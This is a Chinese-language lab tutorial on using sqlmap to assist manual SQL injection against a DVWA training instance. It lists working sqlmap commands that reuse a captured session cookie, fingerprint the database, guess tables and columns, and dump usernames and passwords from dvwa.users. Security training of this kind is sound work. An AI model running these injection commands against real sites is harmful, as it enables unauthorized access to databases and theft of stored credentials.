【合天网安】利用sqlmap辅助手工注入
实验背景:
SQLmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL、、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite 、Firebird、Sybase和SAP MaxDB。SQL Map采用了以下5种独特的SQL注入技术。
- 基于布尔型的盲注,即可以根据页面返回页面判断条件真假的注入。
- 基于时间的盲注,即不能根据页面返回的内容判断任何信息,要用条件语句查看时间延迟语句是否已执行(即页面返回时间是否增加)来判断。
- 基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回到页面中
- 联合查询注入,在可以使用Union的情况下的注入
- 堆查询注入,可以同时执行多条语句时的注入
SQLMap强大的功能包括数据库指纹识别、数据库枚举、数据提取、访问目标、文件系统、并在获取完全的操作权限时实行任意命令。SQLMap的功能强大到让人惊叹,当常规的注入工具不能利用SQL注入漏洞进行注入时,使用SQLMap会有意想不到的效果。
实验目的:
通过该实验熟悉sqlmap常用命令,利用sqlmap辅助手工注入。
实验过程:
1)进入DVWA
2)找到并打开SQL Injection ,提交1,打开burpsuite抓包,然后点击submit,获取cookie值
3)使用内置函数获取用户名,版本,数据库名等信息
输入:
sqlmap.py -u http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit --
cookie="PHPSESSID=fhoocn8fpj1t2p0qn2por3gjv4; security=low" --sql-query "select user(),version(),database()"
4)得到数据库名为dvwa,接下来猜表
输入:
sqlmap.py -u http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit --
cookie="PHPSESSID=fhoocn8fpj1t2p0qn2por3gjv4; security=low" --sql-query "(select count(*) from dvwa.users)>0"
5)返回1,说明存在users表,然后开始猜列
输入:
sqlmap.py -u http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit --
cookie="PHPSESSID=fhoocn8fpj1t2p0qn2por3gjv4; security=low" --sql-query "(select count(username) from dvwa.users)>=0"
6)第五步显示没有返回,说明不存在username列,将username改为user,返回1.
输入:
sqlmap.py -u http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit --
cookie="PHPSESSID=fhoocn8fpj1t2p0qn2por3gjv4; security=low" --sql-query "(select count(user) from dvwa.users)>=0"
7)输入:
sqlmap.py -u http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit --
cookie="PHPSESSID=fhoocn8fpj1t2p0qn2por3gjv4; security=low" --sql-query "(select count(password) from dvwa.users)>=0"
8) 最后我们来猜解其列的内容,输入:
sqlmap.py -u http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit --
cookie="PHPSESSID=fhoocn8fpj1t2p0qn2por3gjv4; security=low" --sql-query "select user,password from dvwa.users"
(如有不足或者侵权的地方,请尽快联系我,我会及时修改或删除,非常感谢)
机遇就像晨光,稍纵即逝。把握好机会,利用好时间,去追求更好的自己!
【合天网安】利用sqlmap辅助手工注入相关推荐
- BurpSuite实战——合天网安实验室学习笔记
burpsuite是一款功能强大的用于攻击web应用程序的集成平台,通常在服务器和客户端之间充当一个双向代理,用于截获通信过程中的数据包,对于截获到的包可以人为的进行修改和重放. 此BurpSuite ...
- 【合天网安】FCKeditor 2.4.3文件上传漏洞
[合天网安实验室]FCKeditor 2.4.3文件上传漏洞 编辑器漏洞 常见的文本编辑器有FCKeditor.Ewebeditor.UEditor.KindEditor.XHeditor等,它们包含 ...
- sqlmap指定cookie_利用SQLMap进行cookie注入
SQLMap被称为注入神器,N多大神都使用SQLmap来进行注入测试,我等小菜当然也会用来装一下A*C,用了N久SQLMAP了,但是极少用 到cookie注入,一遇到cookie注入就去使用注入中转工 ...
- 合天网安就业班_CTF挑战赛-合天网安实验室
[TOCCTF挑战赛-合天网安实验室逆向解析] CTF挑战赛-合天网安实验室sourl.cn 1.逆向100 修改后缀为.apk 安卓模拟器打开,发现要求输入Password 用Android逆向助 ...
- 合天网安实验室CTF-基础50-0x01
合天网安实验室CTF-基础50-0x01 最近无聊时准备刷点题,由简到难慢慢来吧 题目描述 真的不能再简单了! 相关附件 misc50.zip 题目链接 参考解题步骤 1.下载下来的压缩包解压 ...
- 合天网安实验室CTF-Web100-Give Me Flag
合天网安实验室CTF-Web100-Give Me Flag 题目描述 哎,不小心把代码弄乱惹 相关附件 web100.zip 题目链接 参考解题步骤 1.下载附件打开后是一段JavaScri ...
- 合天网安实验室CTF-Exp200-Come on,Exploit me!
合天网安实验室CTF-Exp200-Come on,Exploit me! 题目描述 Audrey Tang. ⊙.⊙ 我只能说到这儿了 相关附件 exp200 题目链接 参考解题步骤 1.下 ...
- 合天网安实验室CTF-Steg150-一段欢快的曲调
合天网安实验室CTF-Steg150-一段欢快的曲调 题目描述 滴滴 相关附件 stego100.wav 题目链接 参考解题步骤 1.下载的附件是一段wav格式的音频,打开听了一下,确实是欢快 ...
- 合天网安实验室CTF-解密100-Funny Crypto
合天网安实验室CTF-解密100-Funny Crypto 题目描述 tgbnjuy 8ujko9 5rfgy6 相关附件 题目链接 参考解题步骤 字母 被围起来的字母 图示颜色 tgbnjuy ...
- 合天网安 CTF之第六周-套娃一样的上传
合天网安 CTF之第六周-套娃一样的上传 一.实验目的 本实验无writeup,需要同学们发挥自己所学,拿下最终目标 二.实验环境 目标机:Centos7 IP地址:10.1.1.147:5006 攻 ...
最新文章
- 反编译得到的java文件好多错误 val$query什么意思_这部分代码有错么?一直提示输入框$(#msg).val()得到的值未定义...
- 5个常见的SD-WAN挑战以及如何应对
- kali linux 里vim如何使用_Kali Linux的vi编辑器/vim编辑器使用方法
- 分享一篇关于饿了么的需求文档
- 一文搞懂IT基础知识,讲通HTTP、TCP、IP、以太网
- 乐高ev3搭建图_乐高编程培训是什么都教啥?2020可编程机器人积木编程推荐,...
- logisim数据选择器_基于Logisim的CRC编码电路实现.pdf
- 阿里云邮箱企业版使用 SSL 加密协议登录邮箱
- 关于计算机社团的游戏活动计划,社团心理小游戏活动策划书范文
- 巴西游戏出海攻略,优质游戏出海市场
- L'Hospital法则
- 教你用PS制作gif动态图
- 毫米波雷达和视觉传感器融合的检测仿真代码
- 能够997,是你们这些人修来的福报(手动滑稽)
- 四种属性范围(重点)
- c++成员变量初始化
- Sourcetree 使用详解
- 高德地图四:关键字搜索
- smartupload下载
- RAID数据恢复技术介绍